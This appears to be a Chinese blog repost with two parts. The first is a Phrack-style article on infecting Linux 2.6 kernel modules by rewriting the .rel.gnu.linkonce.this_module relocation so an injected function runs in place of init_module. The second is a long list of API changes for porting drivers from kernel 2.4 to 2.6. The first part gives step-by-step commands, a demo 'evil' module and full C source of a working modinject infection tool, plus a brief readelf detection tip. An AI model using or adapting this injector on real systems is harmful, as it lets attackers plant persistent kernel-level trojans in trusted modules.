全部博文(385)
分类: LINUX
2006-12-27 21:34:34
Migrating to Linux kernel 2.6 |
|
|
|=-------------------[ module injection in 2.6 kernel ]-------------------=| |=------------------------------------------------------------------------=| |=---------------[ CoolQ |=------------------------------------------------------------------------=| 0 - 前言 1 - 2.4 回顾 2 - 2.6 的变化 2.1 2.6的.ko文件 2.2 失效的原因 3 - 对策 3.1 修改.rel.gnu.linkonce.this_module 3.2 例子 4 - 检测module injection的方法 5 - 参考 6 - 代码 --[ 0 - 前言 phrack 61期有一篇不错的文章[1],给出了一种感染内核模块的方法,不过是基于2.4 内核的,该方法在2.6上无效,但是思想还是通用的。通过对2.6内核加载的分析,了解 两者之间的差异,并最终实现2.6下的module injection。 --[ 1 - 2.4 回顾 内核对模块的管理,是通过struct module来实现的,该结构的成员init/cleanup,代表 加载/卸载模块后需要运行的初始化/收尾函数,它的赋值是通过以下代码实现的: module->init = obj_symbol_final_value(f, obj_find_symbol(f, "init_module")); module->cleanup = obj_symbol_final_value(f, obj_find_symbol(f, "cleanup_module")); 可见,insmod需要在.strtab中查找init_module/cleanup_module字符串,并根据索引值 找到相应的.symtab中的符号,将相应的值赋值给module->init/cleanup。 因此,如果能把.strtab中别的字符串替换为init_module,那么系统加载的时候,运行的 就不是原来的init_module函数了。 --[ 2 - 2.6 的变化 2.6中的模块子系统被完全重写,如果用[1]中的工具,发现无论怎么修改.strtab,运行 的始终是原来的init_module。 --[ 2.1 2.6的.ko文件 2.6下的模块,扩展名为.ko,而不是2.4下的.o。很多初学者写完模块之后,会使用2.4的 方法来编译模块 -----------------------------8 test.c 8-------------------------------------- #include #include #include static int dummy_init(void) { printk("hello,world.\n"); return 0; } static void dummy_exit(void) { return; } module_init(dummy_init); module_exit(dummy_exit); MODULE_LICENSE("GPL") ------------------------------8 cut here 8----------------------------------- # gcc -c -O2 -DMODULE -D__KERNEL__ -I/usr/src/linux test.c # insmod test.o No module found in object insmod: error inserting 'test.o': -1 Invalid module format 正确的做法是写一个Makefile,由内核的Kbuild来帮你编译 -------------------------------8 Makefile 8----------------------------------- obj-m := module.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules --------------------------------8 cut here 8---------------------------------- #make make -C /lib/modules/2.6.5-1.358/build SUBDIRS=/test modules make[1]: Entering directory `/lib/modules/2.6.5-1.358/build' CC [M] /test/modinject/test.o Building modules, stage 2. MODPOST CC /test/modinject/test.mod.o LD [M] /test/modinject/test.ko make[1]: Leaving directory `/lib/modules/2.6.5-1.358/build' #ll -rw-r--r-- 1 root root 268 Jan 7 08:31 test.c -rw-r--r-- 1 root root 2483 Jan 8 09:19 test.ko -rw-r--r-- 1 root root 691 Jan 8 09:19 test.mod.c -rw-r--r-- 1 root root 1964 Jan 8 09:19 test.mod.o -rw-r--r-- 1 root root 1064 Jan 8 09:19 test.o 其实上边的test.o就是用gcc生成的test.o,而test.ko是使用下列命令来生成的 #ld -m elf_i386 -r -o test.ko test.o test.mod.o 再来看看test.mod.c,它是由/usr/src/linux/scripts/modpost.c来生成的 #cat test.mod.c #include #include #include MODULE_INFO(vermagic, VERMAGIC_STRING); #undef unix struct module __this_module __attribute__((section(".gnu.linkonce.this_module"))) = { .name = __stringify(KBUILD_MODNAME), .init = init_module, #ifdef CONFIG_MODULE_UNLOAD .exit = cleanup_module, #endif }; static const struct modversion_info ____versions[] __attribute_used__ __attribute__((section("__versions"))) = { { 0, "cleanup_module" }, { 0, "init_module" }, { 0, "struct_module" }, { 0, "printk" }, }; static const char __module_depends[] __attribute_used__ __attribute__((section(".modinfo"))) = "depends="; 可见,test.mod.o只是产生了几个ELF的节,分别是modinfo, .gun.linkonce.this_module (用于重定位,引进了rel.gnu.linkonce.this_module), __versions。而test.ko是test.o 和test.mod.o合并的结果。 --[ 2.2 失效的原因 在2.1给出的test.c中,模块的初始化函数是dummy_init,这是通过module_init (dummy_init)来实现的,module_init的作用是把dummy_init作为init_module的alias,这 个可以查看生成的符号表来验证: 16: 00000000 14 FUNC LOCAL DEFAULT 1 dummy_init 25: 00000000 14 FUNC GLOBAL DEFAULT 1 init_module 看, 符号的st_value都是0,而且除了BIND类型以外,其他的完全一样! 在2.6的内核源代码中,并没有见到对module->init赋值的操作。问题的关键就是 test.mod.c中的那个struct module __this_module,这实际上就是内核用来管理的module 结构。内核装载模块的时候,会将这个节直接复制,并将module的指针指向__this_module , 而".init = init_module"将module->init初始化为init_module. 如果你了解符号的解析过程,你应该很清楚:符号的重定位不需要.strtab的参与 看一下Elf32_Rel的定义 typedef struct { Elf32_Addr r_offset; Elf32_Word r_info; } Elf32_Rel; 和重定位节.rel.gnu.linkonce.this_module Relocation section '.rel.gnu.linkonce.this_module' at offset 0x758 contains 2 entries: Offset Info Type Sym.Value Sym. Name 00000068 00001901 R_386_32 00000000 init_module 0000018c 00001801 R_386_32 0000000e cleanup_module 0x68就是init在module struct中的偏移量,重定位的类型是R_386_32,重定位的目标是 上边符号表中的25: 0x0(节中的偏移量) 14(大小) FUNC(该符号是函数) GLOBAL(全局) Default(可见域) 1(代表是Index为1的节 - .text) init_module(符号名) 也就是说,无论你将.strtab中的init_module修改为什么值,最终重定位的目标还是索引 为25的符号(init_module这个字符串只是给人看得,重定位不使用)。 --[ 3 - 对策 --[ 3.1 修改.rel.gnu.linkonce.this_module 既然知道了问题的原因,解决的方法就很容易了:我们的目标从.strtab变成了 .rel.gnu.linkonce.this_module中的Elf32_Rel entry。 具体的过程如下: 1. 编写木马模块,编译成.o(注意不是.ko),木马的内容在3.2中给出 2. ld -r -o final.ko good.ko evil.o 3. 找到final.ko中的.rel.gnu.linkonce.this_module节 4. 遍历所有的entry, 如果ELF32_R_SYM(rel->r_info) == orig_init_idx,将 rel->r_info的symbol部分替换成木马的函数索引号,cleanup的情况相同 5. 将final.ko重命名为good.ko (因为ko中有一个meta data,名称必须相同) --[ 3.2 例子 我们来把下列代码注射到上边的test.ko中 --------------------------------8 evil.c 8------------------------------------ #include #include #include extern int init_module(void); int main(int argc, char *argv) { printk("hello,evil world.\n"); init_module(); return 0; } -------------------------------8 cut here 8----------------------------------- 1.# gcc -O2 -c -DMODULE -D__KERNEL__ -I/usr/src/linux-2.6/include evil.c .OR. # make (前题是你写了一个符合evil.c的Makefile) 2.# ld -r -o final.ko test.ko evil.o 3.# ./modinject final.ko main [+] - Change Reloc init OK ! 4.# mv final.ko test.ko 5.# insmod test.ko hello,evil world. hello,world. OK. 目的达到。请读者自行考虑木马里调用的为什么是init_module,程序能正常运行的 原因是什么,并对照2.4的相关部分。 --[ 4 - 检测module injection的方法 对付module injection的方法很多,文件完整性检查是方法之一。 如果没有准备哈希数据库,该怎么办呢?我们可以使用readelf或者objdump: # readelf -r test.ko ... Relocation section '.rel.gnu.linkonce.this_module' at offset 0x7a4 contains 2 entries: Offset Info Type Sym.Value Sym. Name 00000068 00001c01 R_386_32 00000010 main <--- 应该是init_module 0000018c 00001901 R_386_32 0000000e cleanup_module 不过一定要瞪大眼睛哦,万一攻击者将init_module->init_modu1e,可不要被骗了 :-} --[ 5 - 参考 [1] [ [2] kernel source code [3] ELF规范 --[ 6 - 代码 /* Name : modinject.c * Author : CoolQ * Purpose: 2.6 kernel module injection * Usage : # gcc -c evil.c * # ld -r good.ko evil.o -o tmp.ko * # mv tmp.ko good.ko # good.ko already infected * # ./modinject good.ko evil_func_start evil_func_end */ #include #include #include #include #include #include #include #include #include #define ERROR(str) \ do{ \ perror(str); \ exit(EXIT_FAILURE); \ }while(0) void usage(char *prog); int check_hdr(Elf32_Ehdr *ehdr); Elf32_Shdr *Elf32_GetSectionByIndex(Elf32_Ehdr *ehdr, int index); Elf32_Shdr *Elf32_GetSectionByName(Elf32_Ehdr *ehdr, char *name); Elf32_Sym *Elf32_GetSymbolByName(Elf32_Ehdr *ehdr, char *name); int Elf32_GetSymbolIndexByName(Elf32_Ehdr *ehdr, char *name); int Elf32_Change_Reloc(Elf32_Rel *sym_rel, int to_idx); void *base; /* mmap base addr */ int main(int argc, char *argv[]) { char *module_file, *evil_init_str, *evil_cleanup_str; int fd, i; struct stat stat; Elf32_Ehdr *ehdr; Elf32_Shdr *shdr, *module_sec; int orig_init_idx, orig_cleanup_idx; int evil_init_idx, evil_cleanup_idx; Elf32_Rel *rel; if(argc != 3 && argc != 4) usage(argv[0]); module_file = argv[1]; evil_init_str = argv[2]; if(argc == 4) evil_cleanup_str = argv[3]; else evil_cleanup_str = NULL; if((fd = open(module_file, O_RDWR)) == -1) ERROR("open file error.\n"); if(fstat(fd, &stat) == -1) ERROR("get stat error.\n"); base = mmap(0, stat.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); if(base == MAP_FAILED) ERROR("mmap error.\n"); ehdr = (Elf32_Ehdr *)base; if(check_hdr(ehdr) == -1) ERROR("Not a valid Elf32 file.\n"); /* get struct module */ module_sec = Elf32_GetSectionByName(ehdr, ".rel.gnu.linkonce.this_module"); if(module_sec == -1) ERROR("this is not a valid module file.\n"); /* get symbol index */ evil_init_idx = Elf32_GetSymbolIndexByName(ehdr, evil_init_str); if(argc == 4) evil_cleanup_idx = Elf32_GetSymbolIndexByName(ehdr, evil_cleanup_str); else evil_cleanup_idx = 0; orig_init_idx = Elf32_GetSymbolIndexByName(ehdr, "init_module"); if(argc == 4) orig_cleanup_idx = Elf32_GetSymbolIndexByName(ehdr, "cleanup_module"); else orig_cleanup_idx = 0; if(evil_init_idx == -1 || evil_cleanup_idx == -1 || orig_init_idx == -1 || orig_cleanup_idx == -1) ERROR("no such func names.\n"); /* change reloc symbols if necessary */ for(i = 0; i < module_sec->sh_size / sizeof(Elf32_Rel); i++){ rel = base + module_sec->sh_offset + i * sizeof(Elf32_Rel); if(ELF32_R_SYM(rel->r_info) == orig_init_idx){ fprintf(stdout, "[+] - Change Reloc init OK !\n"); Elf32_Change_Reloc(rel, evil_init_idx); } else if(argc == 4 && ELF32_R_SYM(rel->r_info) == orig_cleanup_idx){ fprintf(stdout, "[+] - Change Reloc cleanup OK !\n"); Elf32_Change_Reloc(rel, evil_cleanup_idx); } } msync(base, stat.st_size, MS_SYNC); munmap(base, stat.st_size); close(fd); return 0; } void usage(char *prog) { fprintf(stderr, "Usage:\n"); fprintf(stderr, "\t%s infected.ko evil_func_start evil_func_end.\n", prog); fprintf(stderr, "OR\n"); fprintf(stderr, "\t%s infected.ko evil_func_start.\n"); exit(EXIT_FAILURE); return; } int check_hdr(Elf32_Ehdr *ehdr) { /* some sanity checks */ if( ehdr->e_ident[EI_MAG0] != 0x7f || ehdr->e_ident[EI_MAG1] != 'E' || ehdr->e_ident[EI_MAG2] != 'L' || ehdr->e_ident[EI_MAG3] != 'F' || ehdr->e_ident[EI_CLASS] != ELFCLASS32 || ehdr->e_ident[EI_DATA] != ELFDATA2LSB || ehdr->e_ident[EI_VERSION] != EV_CURRENT || ehdr->e_type != ET_REL || ehdr->e_machine != EM_386 ) return -1; else return 0; } Elf32_Shdr *Elf32_GetSectionByIndex(Elf32_Ehdr *ehdr, int index) { return(base + (ehdr->e_shoff + sizeof(Elf32_Shdr) * index)); } Elf32_Shdr *Elf32_GetSectionByName(Elf32_Ehdr *ehdr, char *name) { int i; char *secname; Elf32_Shdr *strtab, *sec; strtab = Elf32_GetSectionByIndex(ehdr, ehdr->e_shstrndx); for(i = 0; i < ehdr->e_shnum; i++){ sec = Elf32_GetSectionByIndex(ehdr, i); secname = base + strtab->sh_offset + sec->sh_name; if(strcmp(name, secname) == 0) return(sec); } return -1; } Elf32_Sym *Elf32_GetSymbolByName(Elf32_Ehdr *ehdr, char *name) { int i; char *sym_name; Elf32_Shdr *symtab, *strtab; Elf32_Sym *symbol; symtab = Elf32_GetSectionByName(ehdr, ".symtab"); strtab = Elf32_GetSectionByName(ehdr, ".strtab"); if(symtab == -1 || strtab == -1) ERROR("no symtab section or strtab section.\n"); for(i = 0; i < symtab->sh_size / sizeof(Elf32_Sym); i++){ symbol = base + symtab->sh_offset + i * sizeof(Elf32_Sym); sym_name = base + strtab->sh_offset + symbol->st_name; if(strcmp(name, sym_name) == 0 && /* only return func symbol */ ELF32_ST_TYPE(symbol->st_info) == STT_FUNC) return symbol; } return -1; } int Elf32_GetSymbolIndexByName(Elf32_Ehdr *ehdr, char *name) { int i; char *sym_name; Elf32_Shdr *symtab, *strtab; Elf32_Sym *symbol; symtab = Elf32_GetSectionByName(ehdr, ".symtab"); strtab = Elf32_GetSectionByName(ehdr, ".strtab"); if(symtab == -1 || strtab == -1) ERROR("no symtab section or strtab section.\n"); for(i = 0; i < symtab->sh_size / sizeof(Elf32_Sym); i++){ symbol = base + symtab->sh_offset + i * sizeof(Elf32_Sym); sym_name = base + strtab->sh_offset + symbol->st_name; if(strcmp(name, sym_name) == 0 && ELF32_ST_TYPE(symbol->st_info) == STT_FUNC) return i; } return -1; } int Elf32_Change_Reloc(Elf32_Rel *sym_rel, int to_idx) { unsigned int type; type = ELF32_R_TYPE(sym_rel->r_info); sym_rel->r_info = ELF32_R_INFO(to_idx, type); return 0; } () 把linux kernel 2.4 上的driver 移植到 2.6 kernel随着Linux2.6的发布,由于2.6内核做了教的改动,各个设备的驱动程序在不同程度上要 进行改写。为了方便各位Linux爱好者我把自己整理的这分文档share出来。该文当列举 了2.6内核同以前版本的绝大多数变化,可惜的是由于时间和精力有限没有详细列出各个 函数的用法。 特别声明:该文档中的内容来自,该网也上也有各个函数的较为详细的 说明可供各位参考。如果需要该文档的word版的朋友, 请mail到weiriver@sohu.com索 取。 1、 使用新的入口 必须包含 module_init(your_init_func); module_exit(your_exit_func); 老版本:int init_module(void); void cleanup_module(voi); 2.4中两种都可以用,对如后面的入口函数不必要显示包含任何头文件。 2、 GPL MODULE_LICENSE("Dual BSD/GPL"); 老版本:MODULE_LICENSE("GPL"); 3、 模块参数 必须显式包含 module_param(name, type, perm); module_param_named(name, value, type, perm); 参数定义 module_param_string(name, string, len, perm); module_param_array(name, type, num, perm); 老版本:MODULE_PARM(variable,type); MODULE_PARM_DESC(variable,type); 4、 模块别名 MODULE_ALIAS("alias-name"); 这是新增的,在老版本中需在/etc/modules.conf配置,现在在代码中就可以实现。 5、 模块计数 int try_module_get(&module); module_put(); 老版本:MOD_INC_USE_COUNT 和 MOD_DEC_USE_COUNT 6、 符号导出 只有显示的导出符号才能被其他模块使用,默认不导出所有的符号,不必使用EXPORT_NO _SYMBOLS 老板本:默认导出所有的符号,除非使用EXPORT_NO_SYMBOLS 7、 内核版本检查 需要在多个文件中包含 老版本:在多个文件中包含 _NO_VERSION__,防止版本重复定义。 8、 设备号 kdev_t被废除不可用,新的dev_t拓展到了32位,12位主设备号,20位次设备号。 unsigned int iminor(struct inode *inode); unsigned int imajor(struct inode *inode); 老版本:8位主设备号,8位次设备号 int MAJOR(kdev_t dev); int MINOR(kdev_t dev); 9、 内存分配头文件变更 所有的内存分配函数包含在头文件 老版本:内存分配函数包含在头文件 10、 结构体的初试化 gcc开始采用ANSI C的struct结构体的初始化形式: static struct some_structure = { .field1 = value, .field2 = value, .. }; 老版本:非标准的初试化形式 static struct some_structure = { field1: value, field2: value, .. }; 11、 用户模式帮助器 int call_usermodehelper(char *path, char **argv, char **envp, int wait); 新增wait参数 12、 request_module() request_module("foo-device-%d", number); 老版本: char module_name[32]; printf(module_name, "foo-device-%d", number); request_module(module_name); 13、 dev_t引发的字符设备的变化 1、取主次设备号为 unsigned iminor(struct inode *inode); unsigned imajor(struct inode *inode); 2、老的register_chrdev()用法没变,保持向后兼容,但不能访问设备号大于256的设备 。 3、新的接口为 a)注册字符设备范围 int register_chrdev_region(dev_t from, unsigned count, char *name); b)动态申请主设备号 int alloc_chrdev_region(dev_t *dev, unsigned baseminor, unsigned count, char *name); 看了这两个函数郁闷吧^_^!怎么和file_operations结构联系起来啊?别急! c)包含 struct cdev *cdev_alloc(void); void cdev_init(struct cdev *cdev, struct file_operations *fops); int cdev_add(struct cdev *cdev, dev_t dev, unsigned count); (分别为,申请cdev结构,和fops连接,将设备加入到系统中!好复杂啊!) d)void cdev_del(struct cdev *cdev); 只有在cdev_add执行成功才可运行。 e)辅助函数 kobject_put(&cdev->kobj); struct kobject *cdev_get(struct cdev *cdev); void cdev_put(struct cdev *cdev); 这一部分变化和新增的/sys/dev有一定的关联。 14、 新增对/proc的访问操作 以前的/proc中只能得到string, seq_file操作能得到如long等多种数据。 相关函数: static struct seq_operations 必须实现这个类似file_operations得数据中得各个成 员函数。 seq_printf(); int seq_putc(struct seq_file *m, char c); int seq_puts(struct seq_file *m, const char *s); int seq_escape(struct seq_file *m, const char *s, const char *esc); int seq_path(struct seq_file *m, struct vfsmount *mnt, struct dentry *dentry, char *esc); seq_open(file, &ct_seq_ops); 等等 15、 底层内存分配 1、 2、分配标志GFP_BUFFER被取消,取而代之的是GFP_NOIO 和 GFP_NOFS 3、新增__GFP_REPEAT,__GFP_NOFAIL,__GFP_NORETRY分配标志 4、页面分配函数alloc_pages(),get_free_page()被包含在 5、对NUMA系统新增了几个函数: a) struct page *alloc_pages_node(int node_id, unsigned int gfp_mask, unsigned int order); b) void free_hot_page(struct page *page); c) void free_cold_page(struct page *page); 6、 新增Memory pools mempool_t *mempool_create(int min_nr, mempool_alloc_t *alloc_fn, mempool_free_t *free_fn, void *pool_data); void *mempool_alloc(mempool_t *pool, int gfp_mask); void mempool_free(void *element, mempool_t *pool); int mempool_resize(mempool_t *pool, int new_min_nr, int gfp_mask); 16、 per-CPU变量 get_cpu_var(); put_cpu_var(); void *alloc_percpu(type); void free_percpu(const void *); per_cpu_ptr(void *ptr, int cpu) get_cpu_ptr(ptr) put_cpu_ptr(ptr) 老版本使用 DEFINE_PER_CPU(type, name); EXPORT_PER_CPU_SYMBOL(name); EXPORT_PER_CPU_SYMBOL_GPL(name); DECLARE_PER_CPU(type, name); DEFINE_PER_CPU(int, mypcint); 2.6内核采用了可剥夺得调度方式这些宏都不安全。 17、 内核时间变化 1、现在的各个平台的HZ为 Alpha: 1024/1200; ARM: 100/128/200/1000; CRIS: 100; i386: 1000; IA-64: 1024; M68K: 100; M68K-nommu: 50-1000; MIPS: 100/128/1000; MIPS64: 100; PA-RISC: 100/1000; PowerPC32: 100; PowerPC64: 1000; S/390: 100; SPARC32: 100; SPARC64: 100; SuperH: 100/1000; UML: 100; v850: 24-100; x86-64: 1000. 2、由于HZ的变化,原来的jiffies计数器很快就溢出了,引入了新的计数器jiffies_64 3、#include u64 my_time = get_jiffies_64(); 4、新的时间结构增加了纳秒成员变量 struct timespec current_kernel_time(void); 5、他的timer函数没变,新增 void add_timer_on(struct timer_list *timer, int cpu); 6、新增纳秒级延时函数 ndelay(); 7、POSIX clocks 参考kernel/posix-timers.c 18、 工作队列(workqueue) 1、任务队列(task queue )接口函数都被取消,新增了workqueue接口函数 struct workqueue_struct *create_workqueue(const char *name); DECLARE_WORK(name, void (*function)(void *), void *data); INIT_WORK(struct work_struct *work, void (*function)(void *), void *data); PREPARE_WORK(struct work_struct *work, void (*function)(void *), void *data); 2、申明struct work_struct结构 int queue_work(struct workqueue_struct *queue, struct work_struct *work); int queue_delayed_work(struct workqueue_struct *queue, struct work_struct *work, unsigned long delay); int cancel_delayed_work(struct work_struct *work); void flush_workqueue(struct workqueue_struct *queue); void destroy_workqueue(struct workqueue_struct *queue); int schedule_work(struct work_struct *work); int schedule_delayed_work(struct work_struct *work, unsigned long delay); 19、 新增创建VFS的"libfs" libfs给创建一个新的文件系统提供了大量的API. 主要是对struct file_system_type的实现。 参考源代码: drivers/hotplug/pci_hotplug_core.c drivers/usb/core/inode.c drivers/oprofile/oprofilefs.c fs/ramfs/inode.c fs/nfsd/nfsctl.c (simple_fill_super() example) 20、 DMA的变化 未变化的有: void *pci_alloc_consistent(struct pci_dev *dev, size_t size, dma_addr_t *dma_handle); void pci_free_consistent(struct pci_dev *dev, size_t size, void *cpu_addr, dma_addr_t dma_handle); 变化的有: 1、 void *dma_alloc_coherent(struct device *dev, size_t size, dma_addr_t *dma_handle, int flag); void dma_free_coherent(struct device *dev, size_t size, void *cpu_addr, dma_addr_t dma_handle); 2、列举了映射方向: enum dma_data_direction { DMA_BIDIRECTIONAL = 0, DMA_TO_DEVICE = 1, DMA_FROM_DEVICE = 2, DMA_NONE = 3, }; 3、单映射 dma_addr_t dma_map_single(struct device *dev, void *addr, size_t size, enum dma_data_direction direction); void dma_unmap_single(struct device *dev, dma_addr_t dma_addr, size_t size, enum dma_data_direction direction); 4、页面映射 dma_addr_t dma_map_page(struct device *dev, struct page *page, unsigned long offset, size_t size, enum dma_data_direction direction); void dma_unmap_page(struct device *dev, dma_addr_t dma_addr, size_t size, enum dma_data_direction direction); 5、有关scatter/gather的函数: int dma_map_sg(struct device *dev, struct scatterlist *sg, int nents, enum dma_data_direction direction); void dma_unmap_sg(struct device *dev, struct scatterlist *sg, int nhwentries, enum dma_data_direction direction); 6、非一致性映射(Noncoherent DMA mappings) void *dma_alloc_noncoherent(struct device *dev, size_t size, dma_addr_t *dma_handle, int flag); void dma_sync_single_range(struct device *dev, dma_addr_t dma_handle, unsigned long offset, size_t size, enum dma_data_direction direction); void dma_free_noncoherent(struct device *dev, size_t size, void *cpu_addr, dma_addr_t dma_handle); 7、DAC (double address cycle) int pci_dac_set_dma_mask(struct pci_dev *dev, u64 mask); void pci_dac_dma_sync_single(struct pci_dev *dev, dma64_addr_t dma_addr, size_t len, int direction); 21、 互斥 新增seqlock主要用于: 1、少量的数据保护 2、数据比较简单(没有指针),并且使用频率很高 3、对不产生任何副作用的数据的访问 4、访问时写者不被饿死 初始化 seqlock_t lock1 = SEQLOCK_UNLOCKED; 或seqlock_t lock2; seqlock_init(&lock2); void write_seqlock(seqlock_t *sl); void write_sequnlock(seqlock_t *sl); int write_tryseqlock(seqlock_t *sl); void write_seqlock_irqsave(seqlock_t *sl, long flags); void write_sequnlock_irqrestore(seqlock_t *sl, long flags); void write_seqlock_irq(seqlock_t *sl); void write_sequnlock_irq(seqlock_t *sl); void write_seqlock_bh(seqlock_t *sl); void write_sequnlock_bh(seqlock_t *sl); unsigned int read_seqbegin(seqlock_t *sl); int read_seqretry(seqlock_t *sl, unsigned int iv); unsigned int read_seqbegin_irqsave(seqlock_t *sl, long flags); int read_seqretry_irqrestore(seqlock_t *sl, unsigned int iv, long flags); 22、 内核可剥夺 preempt_disable(); preempt_enable_no_resched(); preempt_enable_noresched(); preempt_check_resched(); 23、 眠和唤醒 1、原来的函数可用,新增下列函数: prepare_to_wait_exclusive(); prepare_to_wait(); 2、等待队列的变化 typedef int (*wait_queue_func_t)(wait_queue_t *wait, unsigned mode, int sync); void init_waitqueue_func_entry(wait_queue_t *queue, wait_queue_func_t func); 24、 新增完成事件(completion events) init_completion(&my_comp); void wait_for_completion(struct completion *comp); void complete(struct completion *comp); void complete_all(struct completion *comp); 25、 RCU(Read-copy-update) rcu_read_lock(); void call_rcu(struct rcu_head *head, void (*func)(void *arg), void *arg); 26、 中断处理 1、中断处理有返回值了。 IRQ_RETVAL(handled); 2、cli(), sti(), save_flags(), 和 restore_flags()不再有效,应该使用local_save _flags() 或local_irq_disable()。 3、synchronize_irq()函数有改动 4、新增int can_request_irq(unsigned int irq, unsigned long flags); 5、 request_irq() 和free_irq() 从 27、 异步I/O(AIO) ssize_t (*aio_read) (struct kiocb *iocb, char __user *buffer, size_t count, loff_t pos); ssize_t (*aio_write) (struct kiocb *iocb, const char __user *buffer, size_t count, loff_t pos); int (*aio_fsync) (struct kiocb *, int datasync); 新增到了file_operation结构中。 is_sync_kiocb(struct kiocb *iocb); int aio_complete(struct kiocb *iocb, long res, long res2); 28、 网络驱动 1、struct net_device *alloc_netdev(int sizeof_priv, const char *name, void (*setup)(struct net_device *)); struct net_device *alloc_etherdev(int sizeof_priv); 2、新增NAPI(New API) void netif_rx_schedule(struct net_device *dev); void netif_rx_complete(struct net_device *dev); int netif_rx_ni(struct sk_buff *skb); (老版本为netif_rx()) 29、 USB驱动 老版本struct usb_driver取消了,新的结构体为 struct usb_class_driver { char *name; struct file_operations *fops; mode_t mode; int minor_base; }; int usb_submit_urb(struct urb *urb, int mem_flags); int (*probe) (struct usb_interface *intf, const struct usb_device_id *id); 30、 block I/O 层 这一部分做的改动最大。不祥叙。 31、 mmap() int remap_page_range(struct vm_area_struct *vma, unsigned long from, unsigned long to, unsigned long size, pgprot_t prot); int io_remap_page_range(struct vm_area_struct *vma, unsigned long from, unsigned long to, unsigned long size, pgprot_t prot); struct page *(*nopage)(struct vm_area_struct *area, unsigned long address, int *type); int (*populate)(struct vm_area_struct *area, unsigned long address, unsigned long len, pgprot_t prot, unsigned long pgoff, int nonblock); int install_page(struct mm_struct *mm, struct vm_area_struct *vma, unsigned long addr, struct page *page, pgprot_t prot); struct page *vmalloc_to_page(void *address); 32、 零拷贝块I/O(Zero-copy block I/O) struct bio *bio_map_user(struct block_device *bdev, unsigned long uaddr, unsigned int len, int write_to_vm); void bio_unmap_user(struct bio *bio, int write_to_vm); int get_user_pages(struct task_struct *task, struct mm_struct *mm, unsigned long start, int len, int write, int force, struct page **pages, struct vm_area_struct **vmas); 33、 高端内存操作kmaps void *kmap_atomic(struct page *page, enum km_type type); void kunmap_atomic(void *address, enum km_type type); struct page *kmap_atomic_to_page(void *address); 老版本:kmap() 和 kunmap()。 34、 驱动模型 主要用于设备管理。 1、 sysfs 2、 Kobjects |